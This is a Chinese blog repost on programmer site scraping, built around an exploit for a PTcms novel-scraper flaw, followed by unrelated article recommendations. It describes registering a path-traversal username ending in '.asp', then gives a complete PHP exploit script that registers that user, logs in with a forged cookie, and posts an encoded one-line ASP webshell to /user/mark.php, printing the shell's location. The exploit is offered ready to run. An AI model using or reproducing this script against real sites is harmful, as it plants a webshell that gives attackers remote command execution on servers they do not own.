php小偷cookie,ptcms小说小偷程序 最新EXP漏洞-程序员宅基地

技术标签: php小偷cookie  

于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,

那么我们注册../../1.asp; 或者../../2.asp

然后在书架或者收藏哪里插入一句话,

对应的木马地址是

https://www.webshell.cc/1.asp/mark.ptv

ps://针对解析漏洞的 鸡肋

下面放出落叶的exp 怕在下面大家看不到哈。

//error_reporting(0);

print_r('

+---------------------------------------------------------------------------+

PTcms Code written Exploit

by:[email protected]

welcome to [url]www.90sec.org[/url]

+---------------------------------------------------------------------------+

'

);

if($argv[1]==null){

print_r('

Usage: php '.$argv[0].' url

Example:

php '.$argv[0].' [url]www.site.com[/url]

');

;exit;

}

$url=$argv[1];

$user=substr(md5(time()),0,10).".asp";

$settime=date("Y-m-d",time());

$to=postzend($url,"username=$user&password=hacker&chk_password=hacker&dosubmit=%CF%C2%D2%BB%B2%BD");

if($to!==null){

postzend($url,"comeurl=http%3A%2F%2Fwww.cscity.net%2Fuser%2Findex.php&username=$to&password=hacker&cookietime=31536000&dosubmit=%CC%E1+%BD%BB",'login','/user/logchk.php');

$cookie="logtime=$settime; logip=110.110.110.110; pt_userlv=%B7%B2%C8%CB; pt_userpmnum=0; pt_username=$to";

postzend($url,'1=%3C%25execute+request%28chr%2835%29%29%25%3E&dochange=%D0%DE+%B8%C4','exploit','/user/mark.php',$cookie);

}

function postzend($url,$content,$type='reg',$path='/user/reg.php?step=3',$cookie='ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON'){

global $user;

$host=$url;

$port="80";

$data = "POST $path HTTP/1.1\r\n";

$data .= "Host: ".$host."\r\n";

$data .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";

$data .= "Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\n";

$data .= "Referer: http://$host/user/reg.php?step=2\r\n";

$data .= "Cookie: $cookie\r\n";

$data .= "Connection: keep-alive\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

$ock=fsockopen($host,$port);

if (!$ock) {

echo "[-] No response from $host \n";

die;

}

fwrite($ock,$data);

while (!feof($ock)) {

$exp .=fgets($ock, 1024);

}

if($type=='reg'){

$tag="注册成功";$msg="Reg Successful\n[-] shellpath [-] \nhttp://$host/data/user/$user/mark.ptv";

}

if($type=='login'){$tag="登录成功";$msg="Login Successful";}

preg_match("/

(.*?)
/", $exp, $arr);

$result=explode(",",$arr[1]);

if($result[0]=="$tag"){

echo "[*] $msg \n";

return $user;

}else{

preg_match("/

(.*?)
/", $exp, $arrs);

if(is_array($arrs)){

echo "[*] Exploit Successful\n";

echo "[*] The pass # \n";

}else{

echo "[-] Exploit Failed\n";

}

return false;

exit;

}

}

?>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3108.html

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42419782/article/details/115133634

智能推荐

USART库函数_usart_deinit-程序员宅基地

文章浏览阅读9.4k次,点赞20次,收藏82次。1.void USART_DeInit(USART_TypeDef* USARTx)功能:将USART寄存器重置为默认值注释:主要是调用了RCC_APBxPeriphResetCmd函数对寄存器进行复位例如:USART_DeInit(USART1); 2.void USART_Init(USART_TypeDef* USARTx, USART_InitTypeDef* USAR..._usart_deinit

排列计算(一维差分)模板_tr-uhpc一维差分模型-程序员宅基地

文章浏览阅读183次。先讲一下一维差分:原数组为a[],设差分数组为d[],用于解决对区间的操作问题。原数组记录每个点被访问的次数,开始都为0.例如:原数组a[]区间[L,R]都加上C则可以先利用差分数组d[L]+=c,d[R+1]-=c,因为差分数组的前缀和为原数组,即可发现,区间[L,R]之间的数都加C了,因为d[R+1]-c了所以[R+1,N]之间的数没有变化例子链接:题目:排列计算来源:牛客网题目描述天才程序员菜哭武和石头组队参加一个叫做国际排列计算竞赛 (International C.._tr-uhpc一维差分模型

OpenSSL 3.0 简介(1)_openssl alpha2-程序员宅基地

文章浏览阅读8.6k次,点赞3次,收藏12次。注:尽管OpenSSL 3.0 版的设计原则说明文档(https://www.openssl.org/docs/OpenSSL300Design.html)写得比较晦涩,但还是建议有条件的读者去仔细阅读它。本文提供了一个针对该文档的比较模糊的讲述,目的是让读者能对它有一个粗略的了解。在2020年4月23日,OpenSSL管理委员会和OpenSSL技术委员会发布了OpenSSL 3.0 Alpha1 版本,Alpha 1版本包含基本的功能加上基本的FIPS(Federal Information Proc_openssl alpha2

数据和判定(一)-程序员宅基地

文章浏览阅读177次。数据和判定是所有“智能”程序的基础。在这章的开始,我们先看一下JavaScript是如何理解、或表示数据的。这个很重要,因为JavaScript包含许多数据类型(data types),而且根据它的数据类型来操作数据。错误的使用不同的数据类型会导致意想不到的结果。我们来看一些常见的数据类型问题,你会明白如何把数据的类型转化成其他的。我们也会学习条件语句(conditional ..._举一个需要对变量进行转换的例子

Lotus Notes 日历的【打印到文档】功能,简单而强大!_louts notes批量打印文档-程序员宅基地

文章浏览阅读1.1k次。这个功能最适合用来做日程汇报,很多企业都有类似的需求……可以是日历形式, 也可以是列表: _louts notes批量打印文档

在iOS开发中自动获取当前的位置(GPS定位)_ios开发 获取是否连接北斗卫星-程序员宅基地

文章浏览阅读7.7k次。在iOS开发中自动获取当前的位置(GPS定位)开发环境 xcode5.0首先我们要引入这个框架CoreLocation.framework将这个库引进来#import 还有他的代理方法 CLLocationManagerDelegateGPSViewController.h注意这里的CLLocationManager* locationmanag_ios开发 获取是否连接北斗卫星

随便推点

PCB模块化设计21——RCA接口模块PCB布局布线设计规范_pcb电路板rca插头 另一头是其他对插件-程序员宅基地

文章浏览阅读254次。PCB模块化设计21——RCA接口模块PCB布局布线设计规范_pcb电路板rca插头 另一头是其他对插件

一些不错的技术网站-程序员宅基地

文章浏览阅读566次。宅男程序员给老婆的计算机课程之12:作业点评http://developer.51cto.com/art/201203/321936.htm决策树算法,贝叶斯分类算法http://blog.csdn.net/v_july_v/article/details/7577684Linux 新手生存笔记http://blog.csdn.net/column/details/wklken

长度可变数组(java)_可变长数组java-程序员宅基地

文章浏览阅读1w次。7-3 长度可变数组(30 分)本题目要求定义一个长度可变的整型数组IntArray,数组初始长度为5,当输入的数组元素个数超过数组长度时,数组就自动增加5个元素的容量,即数组长度增加5。IntArray类要有得到数组实际长度的方法getLength(),添加数组元素的方法addElement(int)(参数为数组元素的值),得到数组元素的方法getElement(int)(参数为_可变长数组java

深度优先搜索算法_13.在进行关联规则任务时使用的深度优先搜索策略的算法有哪些? () (5分) a.fp-程序员宅基地

文章浏览阅读1.3k次。学自《ANDROID_2.0游戏开发实战宝典》 深度优先路径搜索 深度优先搜索DFS在搜索过程中不考虑各个边的开销,只考虑路径的选择。其思路是站在一个连通图的点上,然后尽可能沿着一条边深入,当遇到死胡同就进行回溯,然后继续搜索,直到找到目标为止。 直接上例子,例子中注释有详细说明:MapList.javapackage com.liang_13.在进行关联规则任务时使用的深度优先搜索策略的算法有哪些? () (5分) a.fp

twisted.internet.error.TimeoutError错误的解决方法_twisted.internet.error.tcptimedouterror-程序员宅基地

文章浏览阅读1.6k次。使用scapy 爬取的时候,少数请求链接会出现请求超时,当出现请求超时时,爬虫会自动重试三次。若超过180s且三次后仍没有得到数据,就会放弃请求出现twisted.internet.error.TimeoutError 错误。此时就出现了爬取失败的情况。错误原因:当网络无法满足在180s内下载完所有的请求数量,就会出现此类错误。解决办法:这里做个示例,具体情况具体分析1、降低同时请求的数量CONCURRENT_REQUESTS = 22、 设置合适的超时时间,DOWNLOAD_TIMEOU_twisted.internet.error.tcptimedouterror

[linux]单网卡绑定多个IP_单网卡绑定两个ip-程序员宅基地

文章浏览阅读215次。[linux]单网卡绑定多个IP配置默认网关:默认网关的文件:/etc/sysconfig/network 内容如下:其中test为主机名称NETWORKING=yesHOSTNAME=testGATEWAY=192.168.168.250或:NOZEROCONF=yesGATEWAY=10.230.17.1eth0对应的配置文件/etc/sysconfig/network-scripts/ifcfg-eth0内容如下:DEVICE=eth0BOO.._单网卡绑定两个ip

推荐文章

热门文章

相关标签